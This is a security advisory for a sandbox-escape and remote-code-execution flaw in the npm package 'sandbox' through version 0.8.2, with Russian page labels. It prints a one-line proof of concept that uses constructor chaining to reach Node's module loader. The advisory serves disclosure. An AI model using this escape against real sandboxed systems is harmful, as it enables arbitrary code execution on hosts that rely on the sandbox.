GHSA-fm4j-4xhm-xpwx

Опубликовано: 02 сент. 2020

Источник: github

Github: Прошло ревью

Описание

Sandbox Breakout / Arbitrary Code Execution in sandbox

All versions of sandbox through 0.8.2 are vulnerable to Sandbox Escape leading to Remote Code Execution. Due to insufficient input sanitization it is possible to escape the sandbox using constructors.

Proof of concept

var Sandbox = require("sandbox") s = new Sandbox() code = `new Function("return (this.constructor.constructor('return (this.process.mainModule.constructor._load)')())")()("util").inspect("hi")` s.run(code)

Recommendation

No fix is currently available. Consider using an alternative module until a fix is made available.

Ссылки

https://github.com/gf3/sandbox/issues/50
https://www.npmjs.com/advisories/766

Пакеты

Наименование

sandbox

npm

Затронутые версииВерсия исправления

>= 0.0.0

Отсутствует